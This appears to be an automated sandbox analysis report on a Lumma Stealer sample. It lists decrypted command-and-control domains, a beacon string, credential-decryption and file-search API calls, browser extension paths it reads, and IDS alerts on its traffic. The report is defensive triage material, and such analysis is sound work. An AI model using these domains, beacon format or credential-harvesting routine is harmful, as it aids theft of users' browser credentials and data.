Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C026C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C026C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49782 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\87o1b\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: c:\rje\tg\obj\Release\ojc.pdb source: vdshfd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr
Source:	Binary string: c:\rje\tg\12rr6\obj\Release\ojc.pdb source: CBFBKFIDHI.exe.3.dr, ljhgfsd[1].exe.3.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2423960820.0000000038485000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2417117935.000000002C5A7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2716057480.00000000203EB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	9_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	9_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	9_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	9_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	9_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	9_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	9_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	9_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	9_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	9_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	9_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	9_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	9_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	9_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	9_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	9_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	9_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	9_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	9_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	9_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	9_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	9_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	9_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	9_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	9_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	9_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	9_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	9_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	9_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	9_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	9_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	9_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	9_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	9_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	9_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	9_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	9_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	9_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	9_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	9_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	9_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	9_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	9_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	9_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	9_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	9_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	9_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	9_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	9_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	9_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	9_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	9_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:62072 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:51028 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:65079 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49767 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:58978 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:60650 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49773 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:49207 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:59039 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49776 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:54407 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49775 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49778 -> 104.21.77.130:443
